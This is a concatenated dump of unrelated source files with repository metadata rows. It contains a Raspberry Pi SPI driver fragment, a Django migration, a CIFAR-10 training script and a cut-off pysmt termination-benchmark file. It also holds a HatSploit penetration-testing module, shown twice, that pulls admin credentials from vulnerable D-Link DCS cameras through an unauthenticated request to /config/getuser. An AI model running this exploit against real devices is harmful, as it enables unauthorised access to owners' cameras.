super(LocalPiHardwareSPI, self).close()
@property
def closed(self):
return self._interface is None
def __repr__(self):
try:
self._check_open()
return 'SPI(port=%d, device=%d)' % (self._port, self._device)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
return self._interface.xfer2(data)
def _get_clock_mode(self):
return self._interface.mode
def _set_clock_mode(self, value):
self._interface.mode = value
def _get_lsb_first(self):
return self._interface.lsbfirst
def _set_lsb_first(self, value):
self._interface.lsbfirst = bool(value)
def _get_select_high(self):
return self._interface.cshigh
def _set_select_high(self, value):
self._interface.cshigh = bool(value)
def _get_bits_per_word(self):
return self._interface.bits_per_word
def _set_bits_per_word(self, value):
self._interface.bits_per_word = value
class LocalPiSoftwareSPI(SPI, OutputDevice):
def __init__(self, factory, clock_pin, mosi_pin, miso_pin, select_pin):
self._bus = None
super(LocalPiSoftwareSPI, self).__init__(select_pin, active_high=False)
try:
self._clock_phase = False
self._lsb_first = False
self._bits_per_word = 8
self._bus = SPISoftwareBus(clock_pin, mosi_pin, miso_pin)
except:
self.close()
raise
def _conflicts_with(self, other):
return not (
isinstance(other, LocalPiSoftwareSPI) and
(self.pin.number != other.pin.number)
)
def close(self):
if self._bus is not None:
self._bus.close()
self._bus = None
super(LocalPiSoftwareSPI, self).close()
@property
def closed(self):
return self._bus is None
def __repr__(self):
try:
self._check_open()
return 'SPI(clock_pin=%d, mosi_pin=%d, miso_pin=%d, select_pin=%d)' % (
self._bus.clock.pin.number,
self._bus.mosi.pin.number,
self._bus.miso.pin.number,
self.pin.number)
except DeviceClosed:
return 'SPI(closed)'
def transfer(self, data):
with self._bus.lock:
self.on()
try:
return self._bus.transfer(
data, self._clock_phase, self._lsb_first, self._bits_per_word)
finally:
self.off()
def _get_clock_mode(self):
with self._bus.lock:
return (not self._bus.clock.active_high) << 1 | self._clock_phase
def _set_clock_mode(self, value):
if not (0 <= value < 4):
raise SPIInvalidClockMode("%d is not a valid clock mode" % value)
with self._bus.lock:
self._bus.clock.active_high = not (value & 2)
self._clock_phase = bool(value & 1)
def _get_lsb_first(self):
return self._lsb_first
def _set_lsb_first(self, value):
self._lsb_first = bool(value)
def _get_bits_per_word(self):
return self._bits_per_word
def _set_bits_per_word(self, value):
if value < 1:
raise ValueError('bits_per_word must be positive')
self._bits_per_word = int(value)
def _get_select_high(self):
return self.active_high
def _set_select_high(self, value):
with self._bus.lock:
self.active_high = value
self.off()
class LocalPiHardwareSPIShared(SharedMixin, LocalPiHardwareSPI):
@classmethod
def _shared_key(cls, factory, port, device):
return (port, device)
class LocalPiSoftwareSPIShared(SharedMixin, LocalPiSoftwareSPI):
@classmethod
def _shared_key(cls, factory, clock_pin, mosi_pin, miso_pin, select_pin):
return (select_pin,)
| true
| true
|
1c40c520d6f4c68d536b05f273f32c0e7d73d9c8
| 2,265
|
py
|
Python
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 139
|
2021-02-17T15:52:30.000Z
|
2022-03-30T14:50:42.000Z
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 27
|
2021-03-24T17:14:30.000Z
|
2022-03-02T18:50:43.000Z
|
hatsploit/modules/exploit/linux/dlink/dcs_credentials_disclosure.py
|
enty8080/HatSplo
|
57ea81c2bc73838cbf7d7062d7e665eda1143d18
|
[
"MIT"
] | 85
|
2021-02-17T15:39:03.000Z
|
2022-03-07T09:08:58.000Z
|
#!/usr/bin/env python3
#
# This module requires HatSploit: https://hatsploit.netlify.app
# Current source: https://github.com/EntySec/HatSploit
#
from hatsploit.lib.module import Module
from hatsploit.utils.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "D-Link DCS Credentials Disclosure",
'Module': "exploit/linux/dlink/dcs_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080) - module developer'
],
'Description': "D-Link DCS-2530L < 1.06.01 and DCS-2670L <= 2.02 credentials disclosure exploit.",
'Platform': "linux",
'Rank': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
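        # A vulnerable device answers with newline-separated key=value pairs,
        # roughly (illustrative values):
        #   name=admin
        #   pass=secret
        # which is what the line-splitting below assumes.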
if 'name' in response.text and 'pass' in response.text:
username = response.text.split('\n')[0].split('=')[1]
password = response.text.split('\n')[1].split('=')[1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.print_warning("Target vulnerable, but no credentials found.")
def check(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if not response or response.status_code != 200:
self.print_error("Target is not vulnerable!")
return False
return True
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.print_process(f"Exploiting {remote_host}...")
if not self.check(remote_host, remote_port):
return
self.exploit(remote_host, remote_port)
| 29.415584
| 106
| 0.568212
|
from hatsploit.lib.module import Module
from hatsploit.utils.http import HTTPClient
class HatSploitModule(Module, HTTPClient):
details = {
'Name': "D-Link DCS Credentials Disclosure",
'Module': "exploit/linux/dlink/dcs_credentials_disclosure",
'Authors': [
'Ivan Nikolsky (enty8080) - module developer'
],
'Description': "D-Link DCS-2530L < 1.06.01 and DCS-2670L <= 2.02 credentials disclosure exploit.",
'Platform': "linux",
'Rank': "high"
}
options = {
'RHOST': {
'Description': "Remote host.",
'Value': None,
'Type': "ip",
'Required': True
},
'RPORT': {
'Description': "Remote port.",
'Value': 80,
'Type': "port",
'Required': True
}
}
def exploit(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if 'name' in response.text and 'pass' in response.text:
username = response.text.split('\n')[0].split('=')[1]
password = response.text.split('\n')[1].split('=')[1]
self.print_table("Credentials", ('Username', 'Password'), (username, password))
else:
self.print_warning("Target vulnerable, but no credentials found.")
def check(self, remote_host, remote_port):
response = self.http_request(
method="GET",
host=remote_host,
port=remote_port,
path='/config/getuser?index=0'
)
if not response or response.status_code != 200:
self.print_error("Target is not vulnerable!")
return False
return True
def run(self):
remote_host, remote_port = self.parse_options(self.options)
self.print_process(f"Exploiting {remote_host}...")
if not self.check(remote_host, remote_port):
return
self.exploit(remote_host, remote_port)
| true
| true
|
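The module above reduces to a single unauthenticated GET request against /config/getuser?index=0, whose plaintext response leaks name=/pass= pairs line by line. A minimal standalone sketch of the same probe, using the common requests library instead of HatSploit's HTTPClient (the target address in the usage note is a placeholder):

import requests

def probe_dcs_credentials(host, port=80, timeout=5.0):
    # Vulnerable firmware answers an unauthenticated GET with lines such as
    # "name=admin" and "pass=secret".
    url = "http://{}:{}/config/getuser?index=0".format(host, port)
    try:
        response = requests.get(url, timeout=timeout)
    except requests.RequestException:
        return None  # host unreachable; treat as not exploitable
    if response.status_code != 200 or "name" not in response.text:
        return None
    fields = dict(line.split("=", 1) for line in response.text.splitlines() if "=" in line)
    return fields.get("name"), fields.get("pass")

# Hypothetical usage: print(probe_dcs_credentials("192.0.2.10"))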
1c40c568ed84a7c5ad953c1385b4f4dfbcd73e5b
| 460
|
py
|
Python
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 26
|
2015-12-05T03:36:49.000Z
|
2022-03-05T12:17:59.000Z
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 181
|
2015-10-14T18:01:19.000Z
|
2021-06-30T13:52:47.000Z
|
councilmatic_core/migrations/0035_bill_html_text.py
|
datamade/django-councilmatic
|
5b074f376667766e4b6dbf093871d294bb35fc51
|
[
"MIT"
] | 18
|
2015-10-22T09:01:24.000Z
|
2020-10-22T19:33:09.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2018-01-08 16:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('councilmatic_core', '0034_event_guid'),
]
operations = [
migrations.AddField(
model_name='bill',
name='html_text',
field=models.TextField(blank=True, null=True),
),
]
| 21.904762
| 58
| 0.617391
|
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('councilmatic_core', '0034_event_guid'),
]
operations = [
migrations.AddField(
model_name='bill',
name='html_text',
field=models.TextField(blank=True, null=True),
),
]
| true
| true
|
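For context, the AddField operation in the migration above is what Django's makemigrations would emit after adding the field to the model. A sketch of the matching model declaration (the Bill class body here is an assumption; only the new field is taken from the migration):

from django.db import models

class Bill(models.Model):
    # Mirrors migrations.AddField above: an optional, nullable HTML rendering
    # of the bill text.
    html_text = models.TextField(blank=True, null=True)

Applying the migration would then be the usual "python manage.py migrate councilmatic_core".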
1c40c5b9cdf2e9fe2acd1666f7d912767d97bb15
| 1,939
|
py
|
Python
|
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | 3
|
2018-10-11T16:19:18.000Z
|
2022-01-16T07:48:06.000Z
|
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | null | null | null |
ch07/train_convnet.py
|
tom01h/deep-learning-from-scratch
|
acb3c31976cd736b4abd21c3e8ab81c3bf0eb9bb
|
[
"MIT"
] | null | null | null |
# coding: utf-8
import sys, os
sys.path.append(os.pardir) # Setting so that files in the parent directory can be imported
import pickle
import time
import cupy as cp
#import numpy as cp
import numpy as np
import matplotlib.pyplot as plt
from dataset.cifar10 import load_cifar10
from simple_convnet import SimpleConvNet
from common.trainer import Trainer
# Load the data
(x_train, t_train), (x_test, t_test) = load_cifar10(normalize=False, flatten=False, one_hot_label=True)
x_train = x_train * 2.0 - 255
x_test = x_test * 2.0 - 255
if os.path.exists("ttarray.pkl"):
with open("ttarray.pkl", 'rb') as f:
t_train = pickle.load(f)
print("Loaded Teacher array!")
# Reduce the dataset if processing takes too long
#train_mask = np.random.choice(x_train.shape[0], 3000)
#x_train = x_train[train_mask]
#t_train = t_train[train_mask]
max_epochs = 25
network = SimpleConvNet(input_dim=(3,32,32),
conv_param = {'filter_num': (32, 32, 64), 'filter_size': 3, 'pad': 1, 'stride': 1},
hidden_size=512, output_size=10, weight_init_std=0.01)
trainer = Trainer(network, x_train, t_train, x_test, t_test,
epochs=max_epochs, mini_batch_size=100,
optimizer='Adam', optimizer_param={'lr': 0.001},
evaluate_sample_num_per_epoch=1000, early_stopping=10)
start = time.time()
trainer.train()
elapsed_time = time.time() - start
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
# Save the parameters
network.save_params("params.pkl")
print("Saved Network Parameters!")
# Plot the graph
markers = {'train': 'o', 'test': 's'}
x = np.arange(trainer.current_epoch)
plt.plot(x, trainer.train_acc_list, marker='o', label='train', markevery=2)
plt.plot(x, trainer.test_acc_list, marker='s', label='test', markevery=2)
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
np.set_printoptions(threshold=50)
print(np.round(trainer.test_acc_list,3))
| 31.274194
| 107
| 0.687983
|
import sys, os
sys.path.append(os.pardir)
import pickle
import time
import cupy as cp
import numpy as np
import matplotlib.pyplot as plt
from dataset.cifar10 import load_cifar10
from simple_convnet import SimpleConvNet
from common.trainer import Trainer
(x_train, t_train), (x_test, t_test) = load_cifar10(normalize=False, flatten=False, one_hot_label=True)
x_train = x_train * 2.0 - 255
x_test = x_test * 2.0 - 255
if os.path.exists("ttarray.pkl"):
with open("ttarray.pkl", 'rb') as f:
t_train = pickle.load(f)
print("Loaded Teacher array!")
max_epochs = 25
network = SimpleConvNet(input_dim=(3,32,32),
conv_param = {'filter_num': (32, 32, 64), 'filter_size': 3, 'pad': 1, 'stride': 1},
hidden_size=512, output_size=10, weight_init_std=0.01)
trainer = Trainer(network, x_train, t_train, x_test, t_test,
epochs=max_epochs, mini_batch_size=100,
optimizer='Adam', optimizer_param={'lr': 0.001},
evaluate_sample_num_per_epoch=1000, early_stopping=10)
start = time.time()
trainer.train()
elapsed_time = time.time() - start
print ("elapsed_time:{0}".format(elapsed_time) + "[sec]")
network.save_params("params.pkl")
print("Saved Network Parameters!")
markers = {'train': 'o', 'test': 's'}
x = np.arange(trainer.current_epoch)
plt.plot(x, trainer.train_acc_list, marker='o', label='train', markevery=2)
plt.plot(x, trainer.test_acc_list, marker='s', label='test', markevery=2)
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
np.set_printoptions(threshold=50)
print(np.round(trainer.test_acc_list,3))
| true
| true
|
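One detail worth flagging in the training script above is the input scaling: x * 2.0 - 255 maps raw uint8 pixels linearly from [0, 255] onto the zero-centered range [-255, 255], rather than the more common [0, 1] or [-1, 1]. A quick sketch of the effect:

import numpy as np

# Raw CIFAR-10 pixels are uint8 in [0, 255].
raw = np.array([0, 128, 255], dtype=np.float64)
scaled = raw * 2.0 - 255
print(scaled)  # [-255.    1.  255.] -- zero-centered, total width 510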
1c40cb511c8e3b54341078d83202f347436c299f
| 7,306
|
py
|
Python
|
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/f3_wrong_hints_permutations/scaling_software_termination/14-2Nested_false-termination_16.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
from typing import Tuple, FrozenSet
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
import pysmt.typing as types
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
symbols = frozenset([pc, x, y])
m_1 = mgr.Int(-1)
n_locs = 3
max_int = n_locs
ints = []
pcs = []
x_pcs = []
for idx in range(n_locs):
num = mgr.Int(idx)
ints.append(num)
pcs.append(mgr.Equals(pc, num))
x_pcs.append(mgr.Equals(x_pc, num))
for idx in range(n_locs, max_int):
num = mgr.Int(idx)
ints.append(num)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = []
# pc = 0 & (x >= 0) -> pc' = 1
cond = mgr.GE(x, ints[0])
cfg.append(mgr.Implies(mgr.And(pcs[0], cond), x_pcs[1]))
# pc = 0 & !(x >= 0) -> pc' = -1
cfg.append(mgr.Implies(mgr.And(pcs[0], mgr.Not(cond)), x_pcend))
# pc = 1 -> pc' = 2
cfg.append(mgr.Implies(pcs[1], x_pcs[2]))
# pc = 2 -> pc' = 0
cfg.append(mgr.Implies(pcs[2], x_pcs[0]))
# pc = -1 -> pc' = -1
cfg.append(mgr.Implies(pcend, x_pcend))
trans = []
same_x = mgr.Equals(x_x, x)
same_y = mgr.Equals(x_y, y)
same = mgr.And(same_x, same_y)
# pc = 0 -> same
trans.append(mgr.Implies(pcs[0], same))
# pc = 1 -> x' = x + y & same_y
trans.append(mgr.Implies(pcs[1],
mgr.And(mgr.Equals(x_x, mgr.Plus(x, y)),
same_y)))
# pc = 2 -> same_x & y' = y + 1
trans.append(mgr.Implies(pcs[2],
mgr.And(same_x,
mgr.Equals(x_y, mgr.Plus(y, ints[1])))))
# pc = end -> same
trans.append(mgr.Implies(pcend, same))
trans = mgr.And(*cfg, *trans)
fairness = mgr.Not(mgr.Equals(pc, m_1))
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
symbs = frozenset([pc, x, y])
m_100 = mgr.Int(-100)
m_1 = mgr.Int(-1)
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_4 = mgr.Int(4)
i_20 = mgr.Int(20)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
res = []
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, x), i_1)))
loc1 = Location(env, mgr.GE(x, i_20))
loc1.set_progress(0, mgr.LT(x_x, mgr.Times(m_1, x, x)))
h_x = Hint("h_x6", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.GT(x_x, y))
loc2 = Location(env, mgr.GE(x, i_2))
loc2.set_progress(0, mgr.GE(x_x, i_20))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(2, mgr.GE(x_y, i_20))
loc2 = Location(env, mgr.TRUE())
loc2.set_progress(0, mgr.And(mgr.GE(x_y, m_100), mgr.LE(x_y, i_0)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y2", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, y))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.TRUE())
loc0.set_progress(0, mgr.TRUE())
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0])
res.append(h_pc)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(x, y)))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GT(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, y), i_1)))
loc1 = Location(env, mgr.GE(x, i_2))
loc1.set_progress(2, mgr.LT(x_x, mgr.Times(m_1, x, x)))
loc2 = Location(env, mgr.LE(x, i_4))
loc2.set_progress(0, mgr.GE(x_x, mgr.Div(x, x)))
h_x = Hint("h_x7", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(i_1, y)))
h_y = Hint("h_y0", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(y, y)))
loc1 = Location(env, mgr.GE(y, i_0))
loc1.set_progress(0, mgr.GE(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y6", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, i_0), mgr.GE(pc, i_1))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(y, pc)))
loc1 = Location(env, mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_y, y))
h_y = Hint("h_y7", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.Equals(pc, i_1))
loc0.set_progress(1, mgr.GT(x_pc, pc))
loc1 = Location(env, mgr.GE(pc, i_2))
loc1.set_progress(0, mgr.Equals(x_pc, mgr.Div(pc, pc)))
h_pc = Hint("h_pc2", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0, loc1])
res.append(h_pc)
return frozenset(res)
| 31.356223
| 77
| 0.586915
|
from typing import Tuple, FrozenSet
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
import pysmt.typing as types
from utils import symb_to_next
from hint import Hint, Location
def transition_system(env: PysmtEnv) -> Tuple[FrozenSet[FNode], FNode, FNode,
FNode]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
symbols = frozenset([pc, x, y])
m_1 = mgr.Int(-1)
n_locs = 3
max_int = n_locs
ints = []
pcs = []
x_pcs = []
for idx in range(n_locs):
num = mgr.Int(idx)
ints.append(num)
pcs.append(mgr.Equals(pc, num))
x_pcs.append(mgr.Equals(x_pc, num))
for idx in range(n_locs, max_int):
num = mgr.Int(idx)
ints.append(num)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
init = pcs[0]
cfg = []
cond = mgr.GE(x, ints[0])
cfg.append(mgr.Implies(mgr.And(pcs[0], cond), x_pcs[1]))
# pc = 0 & !(x >= 0) -> pc' = -1
cfg.append(mgr.Implies(mgr.And(pcs[0], mgr.Not(cond)), x_pcend))
cfg.append(mgr.Implies(pcs[1], x_pcs[2]))
# pc = 2 -> pc' = 0
cfg.append(mgr.Implies(pcs[2], x_pcs[0]))
cfg.append(mgr.Implies(pcend, x_pcend))
trans = []
same_x = mgr.Equals(x_x, x)
same_y = mgr.Equals(x_y, y)
same = mgr.And(same_x, same_y)
# pc = 0 -> same
trans.append(mgr.Implies(pcs[0], same))
# pc = 1 -> x' = x + y & same_y
trans.append(mgr.Implies(pcs[1],
mgr.And(mgr.Equals(x_x, mgr.Plus(x, y)),
same_y)))
trans.append(mgr.Implies(pcs[2],
mgr.And(same_x,
mgr.Equals(x_y, mgr.Plus(y, ints[1])))))
# pc = end -> same
trans.append(mgr.Implies(pcend, same))
trans = mgr.And(*cfg, *trans)
fairness = mgr.Not(mgr.Equals(pc, m_1))
return symbols, init, trans, fairness
def hints(env: PysmtEnv) -> FrozenSet[Hint]:
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
pc = mgr.Symbol("pc", types.INT)
x = mgr.Symbol("x", types.INT)
y = mgr.Symbol("y", types.INT)
symbs = frozenset([pc, x, y])
m_100 = mgr.Int(-100)
m_1 = mgr.Int(-1)
i_0 = mgr.Int(0)
i_1 = mgr.Int(1)
i_2 = mgr.Int(2)
i_4 = mgr.Int(4)
i_20 = mgr.Int(20)
x_pc = symb_to_next(mgr, pc)
x_x = symb_to_next(mgr, x)
x_y = symb_to_next(mgr, y)
res = []
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y3", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, x), i_1)))
loc1 = Location(env, mgr.GE(x, i_20))
loc1.set_progress(0, mgr.LT(x_x, mgr.Times(m_1, x, x)))
h_x = Hint("h_x6", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(2, mgr.GT(x_x, y))
loc2 = Location(env, mgr.GE(x, i_2))
loc2.set_progress(0, mgr.GE(x_x, i_20))
h_x = Hint("h_x4", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_x, x)
loc = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_x, mgr.Plus(x, y)))
h_x = Hint("h_x1", env, frozenset([x]), symbs)
h_x.set_locs([loc])
res.append(h_x)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(2, mgr.GE(x_y, i_20))
loc2 = Location(env, mgr.TRUE())
loc2.set_progress(0, mgr.And(mgr.GE(x_y, m_100), mgr.LE(x_y, i_0)))
h_y = Hint("h_y4", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1, loc2])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100), mgr.LE(x, i_20))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Plus(x, y)))
loc1 = Location(env, mgr.TRUE(), mgr.GE(x, m_100))
loc1.set_progress(0, mgr.Equals(x_y, m_100))
h_y = Hint("h_y2", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Times(x, y)))
loc1 = Location(env, mgr.GE(x, i_1), mgr.GE(y, i_1))
loc1.set_progress(0, mgr.Equals(x_x, y))
h_x = Hint("h_x3", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1])
res.append(h_x)
loc0 = Location(env, mgr.TRUE())
loc0.set_progress(0, mgr.TRUE())
h_pc = Hint("h_pc1", env, frozenset([pc]), symbs)
h_pc.set_locs([loc0])
res.append(h_pc)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(x, y)))
h_y = Hint("h_y1", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(x, i_1), mgr.GT(y, i_1))
loc0.set_progress(1, mgr.Equals(x_x, mgr.Plus(mgr.Times(x, y), i_1)))
loc1 = Location(env, mgr.GE(x, i_2))
loc1.set_progress(2, mgr.LT(x_x, mgr.Times(m_1, x, x)))
loc2 = Location(env, mgr.LE(x, i_4))
loc2.set_progress(0, mgr.GE(x_x, mgr.Div(x, x)))
h_x = Hint("h_x7", env, frozenset([x]), symbs)
h_x.set_locs([loc0, loc1, loc2])
res.append(h_x)
stutter = mgr.Equals(x_y, y)
loc = Location(env, mgr.TRUE(), mgr.LE(x, i_20), stutterT=stutter)
loc.set_progress(0, mgr.Equals(x_y, mgr.Plus(i_1, y)))
h_y = Hint("h_y0", env, frozenset([y]), symbs)
h_y.set_locs([loc])
res.append(h_y)
loc0 = Location(env, mgr.GE(y, m_100))
loc0.set_progress(1, mgr.Equals(x_y, mgr.Times(y, y)))
loc1 = Location(env, mgr.GE(y, i_0))
loc1.set_progress(0, mgr.GE(x_y, mgr.Plus(y, i_1)))
h_y = Hint("h_y6", env, frozenset([y]), symbs)
h_y.set_locs([loc0, loc1])
res.append(h_y)
